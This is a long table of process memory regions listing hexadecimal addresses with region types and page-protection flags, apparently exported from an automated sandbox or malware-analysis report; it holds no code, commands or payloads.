314E000
|
stack
|
page read and write
|
||
|
2C43000
|
heap
|
page read and write
|
||
|
2D02000
|
system
|
page execute and read and write
|
||
|
2FCE000
|
stack
|
page read and write
|
||
|
22448ED3000
|
heap
|
page read and write
|
||
|
357D000
|
stack
|
page read and write
|
||
|
318E000
|
stack
|
page read and write
|
||
|
22448BAA000
|
heap
|
page read and write
|
||
|
548F000
|
stack
|
page read and write
|
||
|
13C0000
|
heap
|
page read and write
|
||
|
22448E30000
|
heap
|
page read and write
|
||
|
307B000
|
stack
|
page read and write
|
||
|
3C10000
|
unclassified section
|
page execute and read and write
|
||
|
4F5E000
|
stack
|
page read and write
|
||
|
22448F31000
|
heap
|
page read and write
|
||
|
B577FC000
|
stack
|
page read and write
|
||
|
22446D0C000
|
heap
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
1C4F6513000
|
heap
|
page read and write
|
||
|
4FEE000
|
stack
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
22448C30000
|
heap
|
page read and write
|
||
|
7FF848D52000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
1C4F5C91000
|
heap
|
page read and write
|
||
|
194BA7E5000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
9C18EFF000
|
stack
|
page read and write
|
||
|
22448BAA000
|
heap
|
page read and write
|
||
|
22446C56000
|
heap
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
74FE000
|
stack
|
page read and write
|
||
|
2A99000
|
stack
|
page read and write
|
||
|
1C4F5C96000
|
heap
|
page read and write
|
||
|
1C4FB21D000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
3227000
|
heap
|
page read and write
|
||
|
A4F6EFE000
|
unkown
|
page readonly
|
||
|
525E000
|
stack
|
page read and write
|
||
|
22446CFC000
|
heap
|
page read and write
|
||
|
4FDE000
|
stack
|
page read and write
|
||
|
2C27000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
1C4FB190000
|
trusted library allocation
|
page read and write
|
||
|
1CABC53E000
|
trusted library allocation
|
page read and write
|
||
|
538E000
|
stack
|
page read and write
|
||
|
179E000
|
stack
|
page read and write
|
||
|
22448FEB000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
53DE000
|
stack
|
page read and write
|
||
|
194BA834000
|
trusted library allocation
|
page read and write
|
||
|
180F0C30000
|
heap
|
page execute and read and write
|
||
|
3806000
|
heap
|
page read and write
|
||
|
733E000
|
stack
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
9C190FE000
|
stack
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page execute and read and write
|
||
|
194B8A70000
|
trusted library allocation
|
page read and write
|
||
|
49DB9B8000
|
stack
|
page read and write
|
||
|
180DA3F3000
|
trusted library allocation
|
page read and write
|
||
|
2E12000
|
heap
|
page read and write
|
||
|
180D8FDC000
|
trusted library allocation
|
page read and write
|
||
|
511D000
|
stack
|
page read and write
|
||
|
3B01000
|
heap
|
page read and write
|
||
|
1C4FB140000
|
trusted library allocation
|
page read and write
|
||
|
22446C56000
|
heap
|
page read and write
|
||
|
1CABA2CD000
|
heap
|
page read and write
|
||
|
4CDE000
|
stack
|
page read and write
|
||
|
A4F64FE000
|
unkown
|
page readonly
|
||
|
2E82000
|
system
|
page execute and read and write
|
||
|
1CAD446B000
|
heap
|
page read and write
|
||
|
2E21000
|
heap
|
page read and write
|
||
|
1CABC921000
|
trusted library allocation
|
page read and write
|
||
|
22448B81000
|
heap
|
page read and write
|
||
|
22446CFC000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
512B000
|
stack
|
page read and write
|
||
|
194B8916000
|
heap
|
page read and write
|
||
|
22448ED2000
|
heap
|
page read and write
|
||
|
3C17000
|
unclassified section
|
page execute and read and write
|
||
|
A4F5DFE000
|
unkown
|
page readonly
|
||
|
194B88CE000
|
heap
|
page read and write
|
||
|
22448C41000
|
heap
|
page read and write
|
||
|
4D6D000
|
stack
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
1CABC7CE000
|
trusted library allocation
|
page read and write
|
||
|
160D000
|
heap
|
page read and write
|
||
|
194B898A000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
194BAC94000
|
trusted library allocation
|
page read and write
|
||
|
2C43000
|
heap
|
page read and write
|
||
|
22448E19000
|
heap
|
page read and write
|
||
|
2A60000
|
system
|
page execute and read and write
|
||
|
2A02000
|
heap
|
page read and write
|
||
|
323F000
|
heap
|
page read and write
|
||
|
2E02000
|
heap
|
page read and write
|
||
|
194BA7EC000
|
trusted library allocation
|
page read and write
|
||
|
1CABC2C0000
|
heap
|
page execute and read and write
|
||
|
1CABBEB0000
|
heap
|
page read and write
|
||
|
180DA36D000
|
trusted library allocation
|
page read and write
|
||
|
2CA9000
|
stack
|
page read and write
|
||
|
194BA7E8000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB193000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB2C7000
|
heap
|
page read and write
|
||
|
2F3D000
|
stack
|
page read and write
|
||
|
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
353F000
|
stack
|
page read and write
|
||
|
1C4FB22A000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
3C30000
|
unclassified section
|
page execute and read and write
|
||
|
73FE000
|
stack
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
49DB8BF000
|
stack
|
page read and write
|
||
|
7FF848BBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FFE000
|
stack
|
page read and write
|
||
|
314E000
|
stack
|
page read and write
|
||
|
1C4FB2C0000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
27B9000
|
stack
|
page read and write
|
||
|
194D29E7000
|
heap
|
page execute and read and write
|
||
|
3600000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
322E000
|
heap
|
page read and write
|
||
|
49DE000
|
stack
|
page read and write
|
||
|
22448B3A000
|
heap
|
page read and write
|
||
|
1CABA240000
|
heap
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
|
1C4F5C74000
|
heap
|
page read and write
|
||
|
357E000
|
stack
|
page read and write
|
||
|
2E21000
|
heap
|
page read and write
|
||
|
194BA775000
|
trusted library allocation
|
page read and write
|
||
|
194B8A80000
|
heap
|
page read and write
|
||
|
792C000
|
stack
|
page read and write
|
||
|
1CABBEB6000
|
heap
|
page read and write
|
||
|
2A02000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
B573FF000
|
stack
|
page read and write
|
||
|
3301000
|
heap
|
page read and write
|
||
|
3532CFE000
|
stack
|
page read and write
|
||
|
1C4FB124000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
|
194B88D2000
|
heap
|
page read and write
|
||
|
322E000
|
heap
|
page read and write
|
||
|
2DDE000
|
stack
|
page read and write
|
||
|
7FF848D61000
|
trusted library allocation
|
page read and write
|
||
|
B576FE000
|
stack
|
page read and write
|
||
|
194D288B000
|
heap
|
page read and write
|
||
|
6401000
|
heap
|
page read and write
|
||
|
475000
|
remote allocation
|
page execute and read and write
|
||
|
194B8A60000
|
heap
|
page readonly
|
||
|
29C0000
|
heap
|
page read and write
|
||
|
7FF848BC0000
|
trusted library allocation
|
page read and write
|
||
|
1C4F63F0000
|
trusted library allocation
|
page read and write
|
||
|
2E30000
|
system
|
page execute and read and write
|
||
|
194CA74F000
|
trusted library allocation
|
page read and write
|
||
|
339E000
|
stack
|
page read and write
|
||
|
3532E7E000
|
stack
|
page read and write
|
||
|
1C4FB1F0000
|
trusted library allocation
|
page read and write
|
||
|
367E000
|
stack
|
page read and write
|
||
|
180F0BF0000
|
heap
|
page execute and read and write
|
||
|
7FF848DA2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F31000
|
trusted library allocation
|
page read and write
|
||
|
6F3E000
|
stack
|
page read and write
|
||
|
22448F0C000
|
heap
|
page read and write
|
||
|
728F000
|
stack
|
page read and write
|
||
|
50DD000
|
stack
|
page read and write
|
||
|
180D6F76000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
49DB6FF000
|
stack
|
page read and write
|
||
|
2E27000
|
heap
|
page read and write
|
||
|
6EFB000
|
stack
|
page read and write
|
||
|
2C28000
|
heap
|
page read and write
|
||
|
A4F5B7E000
|
stack
|
page read and write
|
||
|
3002000
|
heap
|
page read and write
|
||
|
22446D0B000
|
heap
|
page read and write
|
||
|
4DCE000
|
stack
|
page read and write
|
||
|
A4F67FA000
|
stack
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
B56F33000
|
stack
|
page read and write
|
||
|
2E10000
|
heap
|
page read and write
|
||
|
1C4FB302000
|
heap
|
page read and write
|
||
|
180E8D88000
|
trusted library allocation
|
page read and write
|
||
|
3012000
|
heap
|
page read and write
|
||
|
22448C75000
|
heap
|
page read and write
|
||
|
22448F1A000
|
heap
|
page read and write
|
||
|
1C4F5C00000
|
heap
|
page read and write
|
||
|
3501000
|
heap
|
page read and write
|
||
|
773B000
|
stack
|
page read and write
|
||
|
3E00000
|
unclassified section
|
page execute and read and write
|
||
|
3532BFE000
|
stack
|
page read and write
|
||
|
49DBCBC000
|
stack
|
page read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
748C000
|
stack
|
page read and write
|
||
|
2C44000
|
heap
|
page read and write
|
||
|
3012000
|
heap
|
page read and write
|
||
|
1C4FB280000
|
trusted library allocation
|
page read and write
|
||
|
38FF000
|
stack
|
page read and write
|
||
|
22448B31000
|
heap
|
page read and write
|
||
|
2E3F000
|
heap
|
page read and write
|
||
|
2E43000
|
heap
|
page read and write
|
||
|
22448C35000
|
heap
|
page read and write
|
||
|
180D6BB0000
|
heap
|
page read and write
|
||
|
22448E31000
|
heap
|
page read and write
|
||
|
22446CFC000
|
heap
|
page read and write
|
||
|
2C2E000
|
heap
|
page read and write
|
||
|
180D6E0A000
|
heap
|
page read and write
|
||
|
3606000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
180D6DBF000
|
heap
|
page read and write
|
||
|
180D8CB2000
|
trusted library allocation
|
page read and write
|
||
|
2C75000
|
heap
|
page read and write
|
||
|
7FF848BB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
27B0000
|
system
|
page execute and read and write
|
||
|
22448EC4000
|
heap
|
page read and write
|
||
|
3701000
|
heap
|
page read and write
|
||
|
1C4F5CA5000
|
heap
|
page read and write
|
||
|
2E25000
|
heap
|
page read and write
|
||
|
2BEE000
|
stack
|
page read and write
|
||
|
3B04000
|
heap
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
1CABC4E1000
|
trusted library allocation
|
page read and write
|
||
|
545D000
|
stack
|
page read and write
|
||
|
1C4FB31E000
|
heap
|
page read and write
|
||
|
9C18FFD000
|
stack
|
page read and write
|
||
|
3101000
|
heap
|
page read and write
|
||
|
2D01000
|
heap
|
page read and write
|
||
|
1C4FB121000
|
trusted library allocation
|
page read and write
|
||
|
6E00000
|
trusted library allocation
|
page read and write
|
||
|
3027000
|
heap
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
B5727F000
|
stack
|
page read and write
|
||
|
22448B5F000
|
heap
|
page read and write
|
||
|
22448C88000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
2E27000
|
heap
|
page read and write
|
||
|
4DAE000
|
stack
|
page read and write
|
||
|
1C4F5C3F000
|
heap
|
page read and write
|
||
|
2E2E000
|
heap
|
page read and write
|
||
|
1C4F5BA0000
|
trusted library allocation
|
page read and write
|
||
|
22448B5F000
|
heap
|
page read and write
|
||
|
2BF9000
|
stack
|
page read and write
|
||
|
2C2E000
|
heap
|
page read and write
|
||
|
539E000
|
stack
|
page read and write
|
||
|
6D40000
|
trusted library allocation
|
page read and write
|
||
|
353E000
|
stack
|
page read and write
|
||
|
1C4FC000000
|
heap
|
page read and write
|
||
|
2739000
|
stack
|
page read and write
|
||
|
A4F637E000
|
stack
|
page read and write
|
||
|
194D27F5000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
355E000
|
stack
|
page read and write
|
||
|
2CC9000
|
stack
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
1530000
|
unclassified section
|
page execute and read and write
|
||
|
3632000
|
heap
|
page read and write
|
||
|
7FF848CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
194B87B0000
|
heap
|
page read and write
|
||
|
2C87000
|
heap
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
22448B9A000
|
heap
|
page read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
49DB57E000
|
stack
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB313000
|
heap
|
page read and write
|
||
|
1C4FB2FB000
|
heap
|
page read and write
|
||
|
1C4FB4C0000
|
remote allocation
|
page read and write
|
||
|
2949000
|
stack
|
page read and write
|
||
|
194CA6F0000
|
trusted library allocation
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
22448F1A000
|
heap
|
page read and write
|
||
|
22448B46000
|
heap
|
page read and write
|
||
|
22448D24000
|
heap
|
page read and write
|
||
|
4C6B000
|
stack
|
page read and write
|
||
|
7FF848C96000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4F6D30000
|
trusted library section
|
page readonly
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
69C0000
|
trusted library allocation
|
page read and write
|
||
|
783C000
|
stack
|
page read and write
|
||
|
327D000
|
heap
|
page read and write
|
||
|
2B6E000
|
stack
|
page read and write
|
||
|
7FF848C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
555D000
|
stack
|
page read and write
|
||
|
22448B56000
|
heap
|
page read and write
|
||
|
2879000
|
stack
|
page read and write
|
||
|
2720000
|
system
|
page execute and read and write
|
||
|
7FF848C70000
|
trusted library allocation
|
page read and write
|
||
|
9C193FB000
|
stack
|
page read and write
|
||
|
180F107B000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
B56FFE000
|
stack
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
2E2E000
|
heap
|
page read and write
|
||
|
9C18DFF000
|
stack
|
page read and write
|
||
|
3226000
|
heap
|
page read and write
|
||
|
27DD000
|
stack
|
page read and write
|
||
|
180F1090000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
7FF848DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3289000
|
heap
|
page read and write
|
||
|
7D3E000
|
stack
|
page read and write
|
||
|
4F6F000
|
stack
|
page read and write
|
||
|
22448C7D000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
6CFC000
|
stack
|
page read and write
|
||
|
339D000
|
stack
|
page read and write
|
||
|
180D6D30000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
2C25000
|
heap
|
page read and write
|
||
|
722C000
|
stack
|
page read and write
|
||
|
22448E19000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
3101000
|
heap
|
page read and write
|
||
|
1C4F651A000
|
heap
|
page read and write
|
||
|
3612000
|
heap
|
page read and write
|
||
|
22448F0F000
|
heap
|
page read and write
|
||
|
4D2B000
|
stack
|
page read and write
|
||
|
22447000000
|
heap
|
page read and write
|
||
|
1CAD4435000
|
heap
|
page read and write
|
||
|
2E7A000
|
heap
|
page read and write
|
||
|
6D3B000
|
stack
|
page read and write
|
||
|
7FF848C7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4FB122000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
34FE000
|
stack
|
page read and write
|
||
|
2722000
|
system
|
page execute and read and write
|
||
|
1C4FB200000
|
heap
|
page read and write
|
||
|
3301000
|
heap
|
page read and write
|
||
|
1CABC892000
|
trusted library allocation
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
22446D0F000
|
heap
|
page read and write
|
||
|
2E5F000
|
heap
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
A4F58FE000
|
unkown
|
page readonly
|
||
|
521B000
|
stack
|
page read and write
|
||
|
22446CD8000
|
heap
|
page read and write
|
||
|
7FF848BC4000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
3532AFE000
|
stack
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
51DE000
|
stack
|
page read and write
|
||
|
2C32000
|
heap
|
page read and write
|
||
|
1C4F6D10000
|
trusted library section
|
page readonly
|
||
|
799B000
|
stack
|
page read and write
|
||
|
74CE000
|
stack
|
page read and write
|
||
|
3301000
|
heap
|
page read and write
|
||
|
1CABC53A000
|
trusted library allocation
|
page read and write
|
||
|
305F000
|
heap
|
page read and write
|
||
|
22448BAA000
|
heap
|
page read and write
|
||
|
2FBE000
|
stack
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
2C2E000
|
heap
|
page read and write
|
||
|
30BC000
|
stack
|
page read and write
|
||
|
22446D05000
|
heap
|
page read and write
|
||
|
4BDE000
|
stack
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB1F0000
|
trusted library allocation
|
page read and write
|
||
|
A4F647E000
|
unkown
|
page readonly
|
||
|
A4F53FC000
|
stack
|
page read and write
|
||
|
3532A73000
|
stack
|
page read and write
|
||
|
194D2960000
|
heap
|
page execute and read and write
|
||
|
49DBB3E000
|
stack
|
page read and write
|
||
|
72DE000
|
stack
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
531B000
|
stack
|
page read and write
|
||
|
2C43000
|
heap
|
page read and write
|
||
|
2C21000
|
heap
|
page read and write
|
||
|
49DBBBE000
|
stack
|
page read and write
|
||
|
A4F52FE000
|
unkown
|
page readonly
|
||
|
22448C4C000
|
heap
|
page read and write
|
||
|
3DE0000
|
unclassified section
|
page execute and read and write
|
||
|
3043000
|
heap
|
page read and write
|
||
|
1C4FB110000
|
trusted library allocation
|
page read and write
|
||
|
322E000
|
heap
|
page read and write
|
||
|
505D000
|
stack
|
page read and write
|
||
|
70FB000
|
stack
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
22448C31000
|
heap
|
page read and write
|
||
|
1C4F6D50000
|
trusted library section
|
page readonly
|
||
|
180F0CE1000
|
heap
|
page read and write
|
||
|
526B000
|
stack
|
page read and write
|
||
|
2BB9000
|
stack
|
page read and write
|
||
|
6E01000
|
heap
|
page read and write
|
||
|
797E000
|
stack
|
page read and write
|
||
|
180D6EB0000
|
trusted library allocation
|
page read and write
|
||
|
324E000
|
stack
|
page read and write
|
||
|
35327EF000
|
stack
|
page read and write
|
||
|
2F01000
|
heap
|
page read and write
|
||
|
2C27000
|
heap
|
page read and write
|
||
|
7FF848C70000
|
trusted library allocation
|
page execute and read and write
|
||
|
180DA674000
|
trusted library allocation
|
page read and write
|
||
|
A4F4DF7000
|
stack
|
page read and write
|
||
|
2E2E000
|
heap
|
page read and write
|
||
|
A4F60FB000
|
stack
|
page read and write
|
||
|
B572FF000
|
stack
|
page read and write
|
||
|
180DA4E2000
|
trusted library allocation
|
page read and write
|
||
|
511B000
|
stack
|
page read and write
|
||
|
194D28AF000
|
heap
|
page read and write
|
||
|
180E8AA0000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB2DE000
|
heap
|
page read and write
|
||
|
1CAD43F8000
|
heap
|
page read and write
|
||
|
4C6D000
|
stack
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
1CABA2DF000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
194B8B50000
|
heap
|
page read and write
|
||
|
509B000
|
stack
|
page read and write
|
||
|
7FF848F53000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D6A000
|
trusted library allocation
|
page read and write
|
||
|
30FE000
|
stack
|
page read and write
|
||
|
180DA739000
|
trusted library allocation
|
page read and write
|
||
|
9C18BFE000
|
stack
|
page read and write
|
||
|
A4F50FE000
|
unkown
|
page readonly
|
||
|
A4F6B7E000
|
stack
|
page read and write
|
||
|
1C4F6A40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
|
180D9B54000
|
trusted library allocation
|
page read and write
|
||
|
6401000
|
heap
|
page read and write
|
||
|
22448C78000
|
heap
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
B5737D000
|
stack
|
page read and write
|
||
|
22447005000
|
heap
|
page read and write
|
||
|
7FF848C0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
326A000
|
stack
|
page read and write
|
||
|
2C27000
|
heap
|
page read and write
|
||
|
35B0000
|
heap
|
page read and write
|
||
|
505B000
|
stack
|
page read and write
|
||
|
1810000
|
unclassified section
|
page execute and read and write
|
||
|
2D01000
|
heap
|
page read and write
|
||
|
3287000
|
heap
|
page read and write
|
||
|
3532B7E000
|
stack
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
22448F0B000
|
heap
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
318E000
|
stack
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
3006000
|
heap
|
page read and write
|
||
|
3600000
|
heap
|
page read and write
|
||
|
B56FBE000
|
stack
|
page read and write
|
||
|
A4F4EFE000
|
unkown
|
page readonly
|
||
|
1CABA280000
|
heap
|
page read and write
|
||
|
A4F61FE000
|
unkown
|
page readonly
|
||
|
22446D06000
|
heap
|
page read and write
|
||
|
1CABC9F2000
|
trusted library allocation
|
page read and write
|
||
|
180D9154000
|
trusted library allocation
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
322F000
|
heap
|
page read and write
|
||
|
519E000
|
stack
|
page read and write
|
||
|
194BAC30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
2DBE000
|
stack
|
page read and write
|
||
|
22448ECB000
|
heap
|
page read and write
|
||
|
22448B61000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
180D6D70000
|
heap
|
page readonly
|
||
|
2C2F000
|
heap
|
page read and write
|
||
|
1C4FB120000
|
trusted library allocation
|
page read and write
|
||
|
3901000
|
heap
|
page read and write
|
||
|
757B000
|
stack
|
page read and write
|
||
|
B5747E000
|
stack
|
page read and write
|
||
|
1CABA293000
|
heap
|
page read and write
|
||
|
180D6F70000
|
heap
|
page read and write
|
||
|
194B89B0000
|
heap
|
page read and write
|
||
|
3301000
|
heap
|
page read and write
|
||
|
3012000
|
heap
|
page read and write
|
||
|
7FF848C76000
|
trusted library allocation
|
page read and write
|
||
|
2E3F000
|
heap
|
page read and write
|
||
|
1CABC4DE000
|
trusted library allocation
|
page read and write
|
||
|
22448EB6000
|
heap
|
page read and write
|
||
|
2E3F000
|
heap
|
page read and write
|
||
|
194B8A50000
|
trusted library allocation
|
page read and write
|
||
|
22448BAA000
|
heap
|
page read and write
|
||
|
1C4FB24E000
|
heap
|
page read and write
|
||
|
1560000
|
heap
|
page read and write
|
||
|
180D8E99000
|
trusted library allocation
|
page read and write
|
||
|
509E000
|
stack
|
page read and write
|
||
|
194D28C8000
|
heap
|
page read and write
|
||
|
A4F65F9000
|
stack
|
page read and write
|
||
|
194BABE4000
|
trusted library allocation
|
page read and write
|
||
|
4B2B000
|
stack
|
page read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
3532C7D000
|
stack
|
page read and write
|
||
|
2E43000
|
heap
|
page read and write
|
||
|
2A32000
|
system
|
page execute and read and write
|
||
|
194B8AC0000
|
heap
|
page read and write
|
||
|
125C000
|
stack
|
page read and write
|
||
|
325F000
|
heap
|
page read and write
|
||
|
6401000
|
heap
|
page read and write
|
||
|
B578FB000
|
stack
|
page read and write
|
||
|
1CAD43F3000
|
heap
|
page read and write
|
||
|
180DA1B7000
|
trusted library allocation
|
page read and write
|
||
|
1CABA260000
|
heap
|
page read and write
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
7FF848BCB000
|
trusted library allocation
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
6C3E000
|
stack
|
page read and write
|
||
|
1426000
|
heap
|
page read and write
|
||
|
2E4F000
|
heap
|
page read and write
|
||
|
180F1050000
|
heap
|
page read and write
|
||
|
782B000
|
stack
|
page read and write
|
||
|
1410000
|
heap
|
page read and write
|
||
|
180F0C37000
|
heap
|
page execute and read and write
|
||
|
343E000
|
stack
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
2E25000
|
heap
|
page read and write
|
||
|
2C2E000
|
heap
|
page read and write
|
||
|
1CAD44EE000
|
heap
|
page read and write
|
||
|
180DA1E0000
|
trusted library allocation
|
page read and write
|
||
|
3101000
|
heap
|
page read and write
|
||
|
2C2F000
|
heap
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
B57678000
|
stack
|
page read and write
|
||
|
3127000
|
unclassified section
|
page execute and read and write
|
||
|
180E8D79000
|
trusted library allocation
|
page read and write
|
||
|
723F000
|
stack
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
3206000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
180F1060000
|
heap
|
page read and write
|
||
|
3600000
|
heap
|
page read and write
|
||
|
2E78000
|
heap
|
page read and write
|
||
|
2F3E000
|
stack
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
1CAD442D000
|
heap
|
page read and write
|
||
|
180E9AA8000
|
trusted library allocation
|
page read and write
|
||
|
3002000
|
heap
|
page read and write
|
||
|
180D6EB2000
|
trusted library allocation
|
page read and write
|
||
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
2E79000
|
heap
|
page read and write
|
||
|
3A00000
|
heap
|
page read and write
|
||
|
2779000
|
stack
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
180D8B11000
|
trusted library allocation
|
page read and write
|
||
|
1537000
|
unclassified section
|
page execute and read and write
|
||
|
194B8897000
|
heap
|
page read and write
|
||
|
22448B36000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
322F000
|
heap
|
page read and write
|
||
|
180D8EA1000
|
trusted library allocation
|
page read and write
|
||
|
180D6FA0000
|
heap
|
page read and write
|
||
|
194B88EE000
|
heap
|
page read and write
|
||
|
2C21000
|
heap
|
page read and write
|
||
|
180F0C6E000
|
heap
|
page read and write
|
||
|
2E25000
|
heap
|
page read and write
|
||
|
7FF848C66000
|
trusted library allocation
|
page read and write
|
||
|
9C18AFE000
|
stack
|
page read and write
|
||
|
2D22000
|
system
|
page execute and read and write
|
||
|
194D288F000
|
heap
|
page read and write
|
||
|
2880000
|
system
|
page execute and read and write
|
||
|
34CE000
|
stack
|
page read and write
|
||
|
308E000
|
stack
|
page read and write
|
||
|
3243000
|
heap
|
page read and write
|
||
|
6600000
|
trusted library allocation
|
page read and write
|
||
|
22448CA0000
|
heap
|
page read and write
|
||
|
3301000
|
heap
|
page read and write
|
||
|
719E000
|
stack
|
page read and write
|
||
|
2E21000
|
heap
|
page read and write
|
||
|
4FDE000
|
stack
|
page read and write
|
||
|
7FF848BB4000
|
trusted library allocation
|
page read and write
|
||
|
180D6DBC000
|
heap
|
page read and write
|
||
|
2569000
|
stack
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
7FF848D61000
|
trusted library allocation
|
page read and write
|
||
|
3402000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
194B88AF000
|
heap
|
page read and write
|
||
|
1C4F6D00000
|
trusted library section
|
page readonly
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
525B000
|
unkown
|
page read and write
|
||
|
3600000
|
